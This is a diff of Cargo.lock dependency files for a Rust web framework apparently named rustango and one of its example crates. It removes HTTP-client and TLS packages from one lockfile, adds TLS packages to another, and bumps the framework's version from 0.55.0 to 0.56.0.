@@ -485,17 +460,6 @@ name = "find-msvc-tools"
 version = "0.1.11"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "d45db016d36b838f563236e9193d0ee6ce38f3f68b6c94e914b4929c96bbb890"
-
-[[package]]
-name = "flate2"
-version = "1.1.10"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "6e634e2e0ebac1ee034020da1ca582e17ffe4e0f5e985823721e168928136dcb"
-dependencies = [
- "crc32fast",
- "miniz_oxide",
- "zlib-rs",
-]
 
 [[package]]
 name = "flume"
@@ -611,10 +575,8 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "ff2abc00be7fca6ebc474524697ae276ad847ad0a6b3faa4bcb027e9a4614ad0"
 dependencies = [
  "cfg-if",
- "js-sys",
  "libc",
  "wasi",
- "wasm-bindgen",
 ]
 
 [[package]]
@@ -636,11 +598,8 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "300e883d756b2e4ec94e02791f39b04b522276138852cfc41d9fb7e904106099"
 dependencies = [
  "cfg-if",
- "js-sys",
  "libc",
  "r-efi 6.0.0",
- "rand_core 0.10.1",
- "wasm-bindgen",
 ]
 
 [[package]]
@@ -795,23 +754,6 @@ dependencies = [
  "pin-project-lite",
  "smallvec",
  "tokio",
- "want",
-]
-
-[[package]]
-name = "hyper-rustls"
-version = "0.27.9"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "33ca68d021ef39cf6463ab54c1d0f5daf03377b70561305bb89a8f83aab66e0f"
-dependencies = [
- "http",
- "hyper",
- "hyper-util",
- "rustls",
- "tokio",
- "tokio-rustls",
- "tower-service",
- "webpki-roots",
 ]
 
 [[package]]
@@ -820,21 +762,13 @@ version = "0.1.20"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "96547c2556ec9d12fb1578c4eaf448b04993e7fb79cbaad930a656880a6bdfa0"
 dependencies = [
- "base64",
  "bytes",
- "futures-channel",
- "futures-util",
  "http",
  "http-body",
  "hyper",
- "ipnet",
- "libc",
- "percent-encoding",
  "pin-project-lite",
- "socket2",
  "tokio",
  "tower-service",
- "tracing",
 ]
 
 [[package]]
@@ -1003,12 +937,6 @@ dependencies = [
 ]
 
 [[package]]
-name = "ipnet"
-version = "2.12.1"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "6a756c3fac73139e83f14c2d742155dd2b78d3ee56597b419a0579b7bdd6dd78"
-
-[[package]]
 name = "itoa"
 version = "1.0.18"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1064,7 +992,6 @@ version = "0.30.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "2e99fb7a497b1e3339bc746195567ed8d3e24945ecd636e3619d20b9de9e9149"
 dependencies = [
- "cc",
  "pkg-config",
  "vcpkg",
 ]
@@ -1089,12 +1016,6 @@ name = "log"
 version = "0.4.34"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "f9f8bd3e56ce4dfc153cf470fffbfa98c7620958b312ca5c3a4b8d5181fd13c6"
-
-[[package]]
-name = "lru-slab"
-version = "0.1.2"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "112b39cec0b298b6c1999fee3e31427f74f676e4cb9879ed1a121b43661a4154"
 
 [[package]]
 name = "matchers"
@@ -1134,16 +1055,6 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "6877bb514081ee2a7ff5ef9de3281f14a4dd4bceac4c09388074a6b5df8a139a"
 
 [[package]]
-name = "miniz_oxide"
-version = "0.9.1"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "b63fbc4a50860e98e7b2aa7804ded1db5cbc3aff9193adaff57a6931bf7c4b4c"
-dependencies = [
- "adler2",
- "simd-adler32",
-]
-
-[[package]]
 name = "mio"
 version = "1.2.3"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1152,6 +1063,23 @@ dependencies = [
  "libc",
  "wasi",
  "windows-sys 0.61.2",
+]
+
+[[package]]
+name = "multer"
+version = "3.1.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "83e87776546dc87511aa5ee218730c92b666d7264ab6ed41f9d215af9cd5224b"
+dependencies = [
+ "bytes",
+ "encoding_rs",
+ "futures-util",
+ "http",
+ "httparse",
+ "memchr",
+ "mime",
+ "spin",
+ "version_check",
 ]
 
 [[package]]
@@ -1377,7 +1305,7 @@ version = "3.5.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "e67ba7e9b2b56446f1d419b1d807906278ffa1a658a8a5d8a39dcb1f5a78614f"
 dependencies = [
- "toml_edit 0.25.13+spec-1.1.0",
+ "toml_edit",
 ]
 
 [[package]]
@@ -1387,62 +1315,6 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "985e7ec9bb745e6ce6535b544d84d6cd6f7ad8bd711c398938ae983b91a766d9"
 dependencies = [
  "unicode-ident",
-]
-
-[[package]]
-name = "quinn"
-version = "0.11.11"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "0c1a41e437b6bbd489372cd4971de128e85c855f56c57f283d20ff016cf7c0a8"
-dependencies = [
- "bytes",
- "cfg_aliases",
- "pin-project-lite",
- "quinn-proto",
- "quinn-udp",
- "rustc-hash",
- "rustls",
- "socket2",
- "thiserror 2.0.20",
- "tokio",
- "tracing",
- "web-time",
-]
-
-[[package]]
-name = "quinn-proto"
-version = "0.11.17"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "04759210543be93709136e28212294a659ef5001836ff4eab4d663e4529bba83"
-dependencies = [
- "bytes",
- "getrandom 0.4.3",
- "lru-slab",
- "rand 0.10.2",
- "rand_pcg",
- "ring",
- "rustc-hash",
- "rustls",
- "rustls-pki-types",
- "slab",
- "thiserror 2.0.20",
- "tinyvec",
- "tracing",
- "web-time",
-]
-
-[[package]]
-name = "quinn-udp"
-version = "0.5.15"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "35a133f956daabe89a61a685c2649f13d82d5aa4bd5d12d1277e1072a21c0694"
-dependencies = [
- "cfg_aliases",
- "libc",
- "once_cell",
- "socket2",
- "tracing",
- "windows-sys 0.61.2",
 ]
 
 [[package]]
@@ -1488,17 +1360,6 @@ dependencies = [
 ]
 
 [[package]]
-name = "rand"
-version = "0.10.2"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "c7f5fa3a058cd35567ef9bfa5e75732bee0f9e4c55fa90477bef2dfcdbc4be80"
-dependencies = [
- "chacha20",
- "getrandom 0.4.3",
- "rand_core 0.10.1",
-]
-
-[[package]]
 name = "rand_chacha"
 version = "0.3.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1534,21 +1395,6 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "76afc826de14238e6e8c374ddcc1fa19e374fd8dd986b0d2af0d02377261d83c"
 dependencies = [
  "getrandom 0.3.4",
-]
-
-[[package]]
-name = "rand_core"
-version = "0.10.1"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "63b8176103e19a2643978565ca18b50549f6101881c443590420e4dc998a3c69"
-
-[[package]]
-name = "rand_pcg"
-version = "0.10.2"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "caa0f4137e1c0a72f4c651489402276c8e8e1cf081f3b0ba156d2cbeef09e86a"
-dependencies = [
- "rand_core 0.10.1",
 ]
 
 [[package]]
@@ -1597,58 +1443,6 @@ name = "regex-syntax"
 version = "0.8.11"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "d6f6ff9a378485b298a5286656da665ba74413d36db0979633275d2e708145d4"
-
-[[package]]
-name = "reqwest"
-version = "0.12.28"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "eddd3ca559203180a307f12d114c268abf583f59b03cb906fd0b3ff8646c1147"
-dependencies = [
- "base64",
- "bytes",
- "futures-core",
- "http",
- "http-body",
- "http-body-util",
- "hyper",
- "hyper-rustls",
- "hyper-util",
- "js-sys",
- "log",
- "percent-encoding",
- "pin-project-lite",
- "quinn",
- "rustls",
- "rustls-pki-types",
- "serde",
- "serde_json",
- "serde_urlencoded",
- "sync_wrapper",
- "tokio",
- "tokio-rustls",
- "tower",
- "tower-http",
- "tower-service",
- "url",
- "wasm-bindgen",
- "wasm-bindgen-futures",
- "web-sys",
- "webpki-roots",
-]
-
-[[package]]
-name = "ring"
-version = "0.17.14"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "a4689e6c2294d81e88dc6261c768b63bc4fcdb852be6d1352498b114f61383b7"
-dependencies = [
- "cc",
- "cfg-if",
- "getrandom 0.2.17",
- "libc",
- "untrusted",
- "windows-sys 0.52.0",
-]
 
 [[package]]
 name = "rpassword"
@@ -1718,7 +1512,6 @@ dependencies = [
  "base64",
  "chrono",
  "cookie",
- "flate2",
  "hmac",
  "http",
  "http-body-util",
@@ -1726,7 +1519,6 @@ dependencies = [
  "inventory",
  "password-hash",
  "rand 0.8.8",
- "reqwest",
  "rpassword",
  "rust_decimal",
  "rustango-macros",
@@ -1740,7 +1532,6 @@ dependencies = [
  "thiserror 1.0.69",
  "time",
  "tokio",
- "toml",
  "tower",
  "tracing",
  "tracing-appender",
@@ -1757,62 +1548,6 @@ dependencies = [
  "quote",
  "serde_json",
  "syn 2.0.119",
-]
-
-[[package]]
-name = "rustango-showcase"
-version = "0.0.0"
-dependencies = [
- "axum",
- "chrono",
- "dotenvy",
- "rustango",
- "serde",
- "serde_json",
- "sqlx",
- "tokio",
- "tracing",
-]
-
-[[package]]
-name = "rustc-hash"
-version = "2.1.3"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "6b1e7f9a428571be2dc5bc0505c13fb6bf936822b894ec87abf8a08a4e51742d"
-
-[[package]]
-name = "rustls"
-version = "0.23.43"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "0283386ce02abc0151e1761d08802dfe86c173b0b494af5cbc086574e453da06"
-dependencies = [
- "once_cell",
- "ring",
- "rustls-pki-types",
- "rustls-webpki",
- "subtle",
- "zeroize",
-]
-
-[[package]]
-name = "rustls-pki-types"
-version = "1.15.1"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "2f4925028c7eb5d1fcdaf196971378ed9d2c1c4efc7dc5d011256f76c99c0a96"
-dependencies = [
- "web-time",
- "zeroize",
-]
-
-[[package]]
-name = "rustls-webpki"
-version = "0.103.15"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "f3c3cf1d8b1e7d4927e2d154c3fcb02979afb9939629c62cd9048d4f07b60ac2"
-dependencies = [
- "ring",
- "rustls-pki-types",
- "untrusted",
 ]
 
 [[package]]
@@ -1897,15 +1632,6 @@ dependencies = [
 ]
 
 [[package]]
-name = "serde_spanned"
-version = "0.6.9"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "bf41e0cfaf7226dca15e8197172c295a782857fcb97fad1808a166870dee75a3"
-dependencies = [
- "serde",
-]
-
-[[package]]
 name = "serde_urlencoded"
 version = "0.7.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1924,7 +1650,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "a978451301f4db1d02937a4ab3ccce137717b81826e79b7d49ffe3244a13c3b8"
 dependencies = [
  "cfg-if",
- "cpufeatures 0.2.17",
+ "cpufeatures",
  "digest",
 ]
 
@@ -1935,7 +1661,7 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "a7507d819769d01a365ab707794a4084392c824f54a7a6a7862f8c3d0892b283"
 dependencies = [
  "cfg-if",
- "cpufeatures 0.2.17",
+ "cpufeatures",
  "digest",
 ]
 
@@ -1973,12 +1699,6 @@ dependencies = [
  "digest",
  "rand_core 0.6.4",
 ]
-
-[[package]]
-name = "simd-adler32"
-version = "0.3.10"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "3a219298ac11a56ea9a6d2120044824d6f01aeb034955e7af7bc16858527deea"
 
 [[package]]
 name = "slab"
@@ -2279,9 +1999,6 @@ name = "sync_wrapper"
 version = "1.0.2"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "0bf256ce5efdfa370213c1dabab5935a12e49f2c58d15e9eac2870d3b4f27263"
-dependencies = [
- "futures-core",
-]
 
 [[package]]
 name = "synstructure"
@@ -2292,6 +2009,19 @@ dependencies = [
  "proc-macro2",
  "quote",
  "syn 2.0.119",
+]
+
+[[package]]
+name = "tenant_user_extension"
+version = "0.1.0"
+dependencies = [
+ "axum",
+ "chrono",
+ "dotenvy",
+ "rustango",
+ "serde",
+ "serde_json",
+ "tokio",
 ]
 
 [[package]]
@@ -2443,16 +2173,6 @@ dependencies = [
 ]
 
 [[package]]
-name = "tokio-rustls"
-version = "0.26.4"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "1729aa945f29d91ba541258c8df89027d5792d85a8841fb65e8bf0f4ede4ef61"
-dependencies = [
- "rustls",
- "tokio",
-]
-
-[[package]]
 name = "tokio-stream"
 version = "0.1.19"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -2461,27 +2181,6 @@ dependencies = [
  "futures-core",
  "pin-project-lite",
  "tokio",
-]
-
-[[package]]
-name = "toml"
-version = "0.8.23"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "dc1beb996b9d83529a9e75c17a1686767d148d70663143c7854d8b4a09ced362"
-dependencies = [
- "serde",
- "serde_spanned",
- "toml_datetime 0.6.11",
- "toml_edit 0.22.27",
-]
-
-[[package]]
-name = "toml_datetime"
-version = "0.6.11"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "22cddaf88f4fbc13c51aebbf5f8eceb5c7c5a9da2ac40a13519eb5b0a0e8f11c"
-dependencies = [
- "serde",
 ]
 
 [[package]]
@@ -2495,27 +2194,14 @@ dependencies = [
 
 [[package]]
 name = "toml_edit"
-version = "0.22.27"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "41fe8c660ae4257887cf66394862d21dbca4a6ddd26f04a3560410406a2f819a"
-dependencies = [
- "indexmap",
- "serde",
- "serde_spanned",
- "toml_datetime 0.6.11",
- "winnow 0.7.15",
-]
-
-[[package]]
-name = "toml_edit"
 version = "0.25.13+spec-1.1.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "6975367e4d2ef766d86af01ffad14b622fecc8d4357a998fbc4deb6e9bacaf9b"
 dependencies = [
  "indexmap",
- "toml_datetime 1.1.1+spec-1.1.0",
+ "toml_datetime",
  "toml_parser",
- "winnow 1.0.4",
+ "winnow",
 ]
 
 [[package]]
@@ -2524,7 +2210,7 @@ version = "1.1.3+spec-1.1.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "1d38ac1cf9b95face32296c0a3ede1fdc270627c9d9c02a7274dd6d960dc4d56"
 dependencies = [
- "winnow 1.0.4",
+ "winnow",
 ]
 
 [[package]]
@@ -2540,24 +2226,6 @@ dependencies = [
  "tokio",
  "tower-layer",
  "tower-service",
-]
-
-[[package]]
-name = "tower-http"
-version = "0.6.11"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "4cfcf7e2740e6fc6d4d688b4ef00650406bb94adf4731e43c096c3a19fe40840"
-dependencies = [
- "bitflags",
- "bytes",
- "futures-util",
- "http",
- "http-body",
- "pin-project-lite",
- "tower",
- "tower-layer",
- "tower-service",
- "url",
 ]
 
 [[package]]
@@ -2647,12 +2315,6 @@ dependencies = [
 ]
 
 [[package]]
-name = "try-lock"
-version = "0.2.5"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "e421abadd41a4225275504ea4d6566923418b7f05506fbc9c0fe86ba7396114b"
-
-[[package]]
 name = "typenum"
 version = "1.20.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -2696,12 +2358,6 @@ name = "unicode-segmentation"
 version = "1.13.3"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "c6f5d3c3b1bf09027a88a6bc961fc00497d651009560b5463668dc81b0fa87a8"
-
-[[package]]
-name = "untrusted"
-version = "0.9.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "8ecb6da28b8a351d773b68d5825ac39017e680750f980f3a1a85cd8dd28a47c1"
 
 [[package]]
 name = "url"
@@ -2762,15 +2418,6 @@ dependencies = [
 ]
 
 [[package]]
-name = "want"
-version = "0.3.1"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "bfa7760aed19e106de2c7c0b581b509f2f25d3dacaf737cb82ac61bc6d760b0e"
-dependencies = [
- "try-lock",
-]
-
-[[package]]
 name = "wasi"
 version = "0.11.1+wasi-snapshot-preview1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -2806,16 +2453,6 @@ dependencies = [
 ]
 
 [[package]]
-name = "wasm-bindgen-futures"
-version = "0.4.77"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "6b7777d5cc23d0e91404e53ce2d5e8ec7acae3026b16233dba62cd3246457950"
-dependencies = [
- "js-sys",
- "wasm-bindgen",
-]
-
-[[package]]
 name = "wasm-bindgen-macro"
 version = "0.2.127"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -2845,35 +2482,6 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "7ef64dbcc55df09c7e5a46182d181c2cfa3e925f3da937ea764728b4bbb9dcbf"
 dependencies = [
  "unicode-ident",
-]
-
-[[package]]
-name = "web-sys"
-version = "0.3.104"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "c435338968042f4f59a557f690a253676d47ce13ceb55d70100e7facf6620a30"
-dependencies = [
- "js-sys",
- "wasm-bindgen",
-]
-
-[[package]]
-name = "web-time"
-version = "1.1.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "5a6580f308b1fad9207618087a65c04e7a10bc77e02c8e84e9b00dd4b12fa0bb"
-dependencies = [
- "js-sys",
- "wasm-bindgen",
-]
-
-[[package]]
-name = "webpki-roots"
-version = "1.0.9"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "7dcd9d09a39985f5344844e66b0c530a33843579125f23e21e9f0f220850f22a"
-dependencies = [
- "rustls-pki-types",
 ]
 
 [[package]]
@@ -2960,16 +2568,7 @@ version = "0.48.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "677d2418bec65e3338edb076e806bc1ec15693c5d0104683f2efe857f61056a9"
 dependencies = [
- "windows-targets 0.48.5",
-]
-
-[[package]]
-name = "windows-sys"
-version = "0.52.0"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "282be5f36a8ce781fad8c8ae18fa3f9beff57ec1b52cb3de0789201425d9a33d"
-dependencies = [
- "windows-targets 0.52.6",
+ "windows-targets",
 ]
 
 [[package]]
@@ -2987,29 +2586,13 @@ version = "0.48.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "9a2fa6e2155d7247be68c096456083145c183cbbbc2764150dda45a87197940c"
 dependencies = [
- "windows_aarch64_gnullvm 0.48.5",
- "windows_aarch64_msvc 0.48.5",
- "windows_i686_gnu 0.48.5",
- "windows_i686_msvc 0.48.5",
- "windows_x86_64_gnu 0.48.5",
- "windows_x86_64_gnullvm 0.48.5",
- "windows_x86_64_msvc 0.48.5",
-]
-
-[[package]]
-name = "windows-targets"
-version = "0.52.6"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "9b724f72796e036ab90c1021d4780d4d3d648aca59e491e6b98e725b84e99973"
-dependencies = [
- "windows_aarch64_gnullvm 0.52.6",
- "windows_aarch64_msvc 0.52.6",
- "windows_i686_gnu 0.52.6",
- "windows_i686_gnullvm",
- "windows_i686_msvc 0.52.6",
- "windows_x86_64_gnu 0.52.6",
- "windows_x86_64_gnullvm 0.52.6",
- "windows_x86_64_msvc 0.52.6",
+ "windows_aarch64_gnullvm",
+ "windows_aarch64_msvc",
+ "windows_i686_gnu",
+ "windows_i686_msvc",
+ "windows_x86_64_gnu",
+ "windows_x86_64_gnullvm",
+ "windows_x86_64_msvc",
 ]
 
 [[package]]
@@ -3019,22 +2602,10 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "2b38e32f0abccf9987a4e3079dfb67dcd799fb61361e53e2882c3cbaf0d905d8"
 
 [[package]]
-name = "windows_aarch64_gnullvm"
-version = "0.52.6"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "32a4622180e7a0ec044bb555404c800bc9fd9ec262ec147edd5989ccd0c02cd3"
-
-[[package]]
 name = "windows_aarch64_msvc"
 version = "0.48.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "dc35310971f3b2dbbf3f0690a219f40e2d9afcf64f9ab7cc1be722937c26b4bc"
-
-[[package]]
-name = "windows_aarch64_msvc"
-version = "0.52.6"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "09ec2a7bb152e2252b53fa7803150007879548bc709c039df7627cabbd05d469"
 
 [[package]]
 name = "windows_i686_gnu"
@@ -3043,28 +2614,10 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "a75915e7def60c94dcef72200b9a8e58e5091744960da64ec734a6c6e9b3743e"
 
 [[package]]
-name = "windows_i686_gnu"
-version = "0.52.6"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "8e9b5ad5ab802e97eb8e295ac6720e509ee4c243f69d781394014ebfe8bbfa0b"
-
-[[package]]
-name = "windows_i686_gnullvm"
-version = "0.52.6"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "0eee52d38c090b3caa76c563b86c3a4bd71ef1a819287c19d586d7334ae8ed66"
-
-[[package]]
 name = "windows_i686_msvc"
 version = "0.48.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "8f55c233f70c4b27f66c523580f78f1004e8b5a8b659e05a4eb49d4166cca406"
-
-[[package]]
-name = "windows_i686_msvc"
-version = "0.52.6"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "240948bc05c5e7c6dabba28bf89d89ffce3e303022809e73deaefe4f6ec56c66"
 
 [[package]]
 name = "windows_x86_64_gnu"
@@ -3073,43 +2626,16 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "53d40abd2583d23e4718fddf1ebec84dbff8381c07cae67ff7768bbf19c6718e"
 
 [[package]]
-name = "windows_x86_64_gnu"
-version = "0.52.6"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "147a5c80aabfbf0c7d901cb5895d1de30ef2907eb21fbbab29ca94c5b08b1a78"
-
-[[package]]
 name = "windows_x86_64_gnullvm"
 version = "0.48.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "0b7b52767868a23d5bab768e390dc5f5c55825b6d30b86c844ff2dc7414044cc"
 
 [[package]]
-name = "windows_x86_64_gnullvm"
-version = "0.52.6"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "24d5b23dc417412679681396f2b49f3de8c1473deb516bd34410872eff51ed0d"
-
-[[package]]
 name = "windows_x86_64_msvc"
 version = "0.48.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "ed94fce61571a4006852b7389a063ab983c02eb1bb37b47f8272ce92d06d9538"
-
-[[package]]
-name = "windows_x86_64_msvc"
-version = "0.52.6"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "589f6da84c646204747d1270a2a5661ea66ed1cced2631d546fdfb155959f9ec"
-
-[[package]]
-name = "winnow"
-version = "0.7.15"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "df79d97927682d2fd8adb29682d1140b343be4ac0f08fd68b7765d9c059d3945"
-dependencies = [
- "memchr",
-]
 
 [[package]]
 name = "winnow"
@@ -3234,12 +2760,6 @@ dependencies = [
  "quote",
  "syn 3.0.4",
 ]
-
-[[package]]
-name = "zlib-rs"
-version = "0.6.7"
-source = "registry+https://github.com/rust-lang/crates.io-index"
-checksum = "34b31d188d9d685a4f9c7b46d6e36631b07058d2cfe190267adce54dc230bf12"
 
 [[package]]
 name = "zmij"

--- a/crates/rustango/examples/tenant_user_extension/Cargo.lock
+++ b/crates/rustango/examples/tenant_user_extension/Cargo.lock
@@ -1445,6 +1445,20 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "d6f6ff9a378485b298a5286656da665ba74413d36db0979633275d2e708145d4"
 
 [[package]]
+name = "ring"
+version = "0.17.14"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "a4689e6c2294d81e88dc6261c768b63bc4fcdb852be6d1352498b114f61383b7"
+dependencies = [
+ "cc",
+ "cfg-if",
+ "getrandom 0.2.17",
+ "libc",
+ "untrusted",
+ "windows-sys 0.52.0",
+]
+
+[[package]]
 name = "rpassword"
 version = "7.5.4"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -1504,7 +1518,7 @@ dependencies = [
 
 [[package]]
 name = "rustango"
-version = "0.55.0"
+version = "0.56.0"
 dependencies = [
  "argon2",
  "async-trait",
@@ -1541,13 +1555,47 @@ dependencies = [
 
 [[package]]
 name = "rustango-macros"
-version = "0.55.0"
+version = "0.56.0"
 dependencies = [
  "proc-macro-crate",
  "proc-macro2",
  "quote",
  "serde_json",
  "syn 2.0.119",
+]
+
+[[package]]
+name = "rustls"
+version = "0.23.43"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "0283386ce02abc0151e1761d08802dfe86c173b0b494af5cbc086574e453da06"
+dependencies = [
+ "once_cell",
+ "ring",
+ "rustls-pki-types",
+ "rustls-webpki",
+ "subtle",
+ "zeroize",
+]
+
+[[package]]
+name = "rustls-pki-types"
+version = "1.15.1"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "2f4925028c7eb5d1fcdaf196971378ed9d2c1c4efc7dc5d011256f76c99c0a96"
+dependencies = [
+ "zeroize",
+]
+
+[[package]]
+name = "rustls-webpki"
+version = "0.103.15"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "f3c3cf1d8b1e7d4927e2d154c3fcb02979afb9939629c62cd9048d4f07b60ac2"
+dependencies = [
+ "ring",
+ "rustls-pki-types",
+ "untrusted",
 ]
 
 [[package]]
@@ -1782,6 +1830,7 @@ dependencies = [
  "once_cell",
  "percent-encoding",
  "rust_decimal",
+ "rustls",
  "serde",
  "serde_json",
  "sha2",
@@ -1792,6 +1841,7 @@ dependencies = [
  "tracing",
  "url",
  "uuid",
+ "webpki-roots 0.26.11",
 ]
 
 [[package]]
@@ -2360,6 +2410,12 @@ source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "c6f5d3c3b1bf09027a88a6bc961fc00497d651009560b5463668dc81b0fa87a8"
 
 [[package]]
+name = "untrusted"
+version = "0.9.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "8ecb6da28b8a351d773b68d5825ac39017e680750f980f3a1a85cd8dd28a47c1"
+
+[[package]]
 name = "url"
 version = "2.5.8"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -2485,6 +2541,24 @@ dependencies = [
 ]
 
 [[package]]
+name = "webpki-roots"
+version = "0.26.11"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "521bc38abb08001b01866da9f51eb7c5d647a19260e00054a8c7fd5f9e57f7a9"
+dependencies = [
+ "webpki-roots 1.0.9",
+]
+
+[[package]]
+name = "webpki-roots"
+version = "1.0.9"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "7dcd9d09a39985f5344844e66b0c530a33843579125f23e21e9f0f220850f22a"
+dependencies = [
+ "rustls-pki-types",
+]
+
+[[package]]
 name = "whoami"
 version = "1.6.1"
 source = "registry+https://github.com/rust-lang/crates.io-index"
@@ -2568,7 +2642,16 @@ version = "0.48.0"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "677d2418bec65e3338edb076e806bc1ec15693c5d0104683f2efe857f61056a9"
 dependencies = [
- "windows-targets",
+ "windows-targets 0.48.5",
+]
+
+[[package]]
+name = "windows-sys"
+version = "0.52.0"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "282be5f36a8ce781fad8c8ae18fa3f9beff57ec1b52cb3de0789201425d9a33d"
+dependencies = [
+ "windows-targets 0.52.6",
 ]
 
 [[package]]
@@ -2586,13 +2669,29 @@ version = "0.48.5"
 source = "registry+https://github.com/rust-lang/crates.io-index"
 checksum = "9a2fa6e2155d7247be68c096456083145c183cbbbc2764150dda45a87197940c"
 dependencies = [
- "windows_aarch64_gnullvm",
- "windows_aarch64_msvc",
- "windows_i686_gnu",
- "windows_i686_msvc",
- "windows_x86_64_gnu",
- "windows_x86_64_gnullvm",
- "windows_x86_64_msvc",
+ "windows_aarch64_gnullvm 0.48.5",
+ "windows_aarch64_msvc 0.48.5",
+ "windows_i686_gnu 0.48.5",
+ "windows_i686_msvc 0.48.5",
+ "windows_x86_64_gnu 0.48.5",
+ "windows_x86_64_gnullvm 0.48.5",
+ "windows_x86_64_msvc 0.48.5",
+]
+
+[[package]]
+name = "windows-targets"
+version = "0.52.6"
+source = "registry+https://github.com/rust-lang/crates.io-index"
+checksum = "9b724f72796e036ab90c1021d4780d4d3d648aca59e491e6b98e725b84e99973"
+dependencies = [
+ "windows_aarch64_gnullvm 0.52.6",
+ "windows_aarch64_msvc 0.52.6",
+ "windows_i686_gnu 0.52.6",
+ "windows_i686_gnullvm",
+ "windows_i686_msvc 0.52.6",
+ "windows_x86_64_gnu 0.52.6",
+ "windows_x86_64_gnullvm 0.52.6",
+ "windows_x86_64_msvc 0.52.6",
 ]
 
 [[package]]
